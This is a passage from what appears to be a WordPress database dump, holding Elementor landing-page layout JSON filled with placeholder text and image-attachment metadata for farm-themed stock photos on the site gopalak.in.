NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ca58180\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"7cf8f66\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d615689\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f6202dc\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2828c5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"f59e578\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"80c0fd8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"08a3c6f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f4344af\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7ae04a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8c99e89\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9f691ad\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"849b2d2\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"9f057df\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"92c8f6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f179456\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c4982a2\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b9adcb0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4d6d933\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"13bc018\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c14036e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b273e28\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(7485,1350,'_elementor_page_assets','a:0:{}'),(7498,1354,'_wp_attached_file','2022/09/istockphoto-1221688781-612x612-1.jpg'),(7499,1354,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:612;s:6:\"height\";i:408;s:4:\"file\";s:44:\"2022/09/istockphoto-1221688781-612x612-1.jpg\";s:8:\"filesize\";i:55116;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:44:\"istockphoto-1221688781-612x612-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21116;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:44:\"istockphoto-1221688781-612x612-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9972;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:44:\"istockphoto-1221688781-612x612-1-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31451;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:42:\"istockphoto-1221688781-612x612-1-50x33.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:33;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2934;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:44:\"istockphoto-1221688781-612x612-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6037;}s:15:\"thaps-thumb-img\";a:5:{s:4:\"file\";s:42:\"istockphoto-1221688781-612x612-1-48x32.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:32;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2749;}s:16:\"taiowc-thumb-img\";a:5:{s:4:\"file\";s:42:\"istockphoto-1221688781-612x612-1-48x32.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:32;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2749;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:24:\"Getty Images/iStockphoto\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:128:\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(7503,1355,'_wp_attached_file','2022/09/803471.jpg'),(7504,1355,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1920;s:6:\"height\";i:1080;s:4:\"file\";s:18:\"2022/09/803471.jpg\";s:8:\"filesize\";i:511877;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"803471-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13399;}s:5:\"large\";a:5:{s:4:\"file\";s:19:\"803471-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:145177;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"803471-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6430;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"803471-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:80309;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:19:\"803471-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:327074;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:18:\"803471-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25912;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:16:\"803471-50x28.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:28;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:903;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:18:\"803471-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3272;}s:15:\"thaps-thumb-img\";a:5:{s:4:\"file\";s:16:\"803471-48x27.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:27;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:828;}s:16:\"taiowc-thumb-img\";a:5:{s:4:\"file\";s:16:\"803471-48x27.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:27;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:828;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(7522,1356,'_wp_attached_file','2022/09/abstract-background-wheat-farm-wallpaper-51701325.jpg'),(7523,1356,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1300;s:6:\"height\";i:957;s:4:\"file\";s:61:\"2022/09/abstract-background-wheat-farm-wallpaper-51701325.jpg\";s:8:\"filesize\";i:139452;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:61:\"abstract-background-wheat-farm-wallpaper-51701325-300x221.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:221;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20460;}s:5:\"large\";a:5:{s:4:\"file\";s:62:\"abstract-background-wheat-farm-wallpaper-51701325-1024x754.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:754;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:137106;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:61:\"abstract-background-wheat-farm-wallpaper-51701325-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9930;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:61:\"abstract-background-wheat-farm-wallpaper-51701325-768x565.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:565;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:86635;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:61:\"abstract-background-wheat-farm-wallpaper-51701325-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26716;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:59:\"abstract-background-wheat-farm-wallpaper-51701325-50x37.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:37;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4737;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:61:\"abstract-background-wheat-farm-wallpaper-51701325-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7052;}s:15:\"thaps-thumb-img\";a:5:{s:4:\"file\";s:59:\"abstract-background-wheat-farm-wallpaper-51701325-48x35.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:35;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4589;}s:16:\"taiowc-thumb-img\";a:5:{s:4:\"file\";s:59:\"abstract-background-wheat-farm-wallpaper-51701325-48x35.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:35;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4589;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:28:\"(c) Jacktmr | Dreamstime.com\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(7526,1357,'_wp_attached_file','2022/09/279356.webp'),(7527,1357,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1920;s:6:\"height\";i:1200;s:4:\"file\";s:19:\"2022/09/279356.webp\";s:8:\"filesize\";i:222110;s:5:\"sizes\";a:17:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"279356-300x188.webp\";s:5:\"width\";i:300;s:6:\"height\";i:188;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:13902;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"279356-1024x640.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:81716;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"279356-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:6350;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"279356-768x480.webp\";s:5:\"width\";i:768;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:55250;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:20:\"279356-1536x960.webp\";s:5:\"width\";i:1536;s:6:\"height\";i:960;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:140148;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:19:\"279356-320x320.webp\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:18928;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:17:\"279356-50x31.webp\";s:5:\"width\";i:50;s:6:\"height\";i:31;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:900;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:19:\"279356-100x100.webp\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:3462;}s:15:\"thaps-thumb-img\";a:5:{s:4:\"file\";s:17:\"279356-48x30.webp\";s:5:\"width\";i:48;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:788;}s:16:\"taiowc-thumb-img\";a:5:{s:4:\"file\";s:17:\"279356-48x30.webp\";s:5:\"width\";i:48;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:788;}s:24:\"elementor_custom_200x200\";a:4:{s:4:\"file\";s:71:\"elementor/thumbs/279356-pv1adzk55gnghyj9kvf6vm8r1w4nkxi7bbi39de9qo.webp\";s:5:\"width\";i:200;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/webp\";}s:24:\"elementor_custom_400x300\";a:4:{s:4:\"file\";s:71:\"elementor/thumbs/279356-pv1adzk7l67r9dig2mh2ko3gqq3pmjyghf6lj7tqrc.webp\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";}s:25:\"elementor_custom_1400x300\";a:4:{s:4:\"file\";s:71:\"elementor/thumbs/279356-pv1adzkjrpyerhowv0c6ee6z9npzh8btci3yrnc8mw.webp\";s:5:\"width\";i:1400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";}s:26:\"elementor_custom_1400x1300\";a:4:{s:4:\"file\";s:71:\"elementor/thumbs/279356-pv1adzkjrq43df3s7r4rpgj34480843nbd2b18lyao.webp\";s:5:\"width\";i:1400;s:6:\"height\";i:1300;s:9:\"mime-type\";s:10:\"image/webp\";}s:26:\"elementor_custom_3400x1300\";a:4:{s:4:\"file\";s:36:\"elementor/thumbs/279356-150x150.webp\";s:5:\"width\";i:3400;s:6:\"height\";i:1300;s:9:\"mime-type\";s:10:\"image/webp\";}s:26:\"elementor_custom_1200x1200\";a:4:{s:4:\"file\";s:71:\"elementor/thumbs/279356-pv1adzkhc0jsm04lq02w0eodfa8y6hne59dsre6i1s.webp\";s:5:\"width\";i:1200;s:6:\"height\";i:1200;s:9:\"mime-type\";s:10:\"image/webp\";}s:25:\"elementor_custom_1200x800\";a:4:{s:4:\"file\";s:71:\"elementor/thumbs/279356-pv1adzkhc0hirmrgdpd1vzcbvwg52xqnrbegnk2lvk.webp\";s:5:\"width\";i:1200;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/webp\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(7558,1358,'_elementor_edit_mode','builder'),(7559,1358,'_elementor_template_type','landing-page'),(7560,1358,'_wp_page_template','elementor_canvas'),(7561,1358,'_elementor_version','3.7.6'),(7562,1358,'_elementor_data','[{\"id\":\"cb7724c\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"284\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"13bd434\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"97e7cee\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lorem Ipsum is simply dummy text \",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d7d2718\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1196cc3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"66192c8\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":664,\"sizes\":[]},\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"-62\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5168614\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"4a07d27\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"327ecb6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"334a86c\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"b1f9c2b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"e5344ab\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e1c5968\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7e686a4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"9d60269\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":101,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5ffd233\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"e2f1149\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"4ecb129\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"3e71e0f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ac03799\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aeb1a8b\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ea0ea08\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"4632219\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"c941f20\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"2c835db\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"cfc2a03\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ca58180\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"7cf8f66\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d615689\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f6202dc\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2828c5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"f59e578\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"80c0fd8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"08a3c6f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f4344af\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7ae04a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8c99e89\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9f691ad\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text 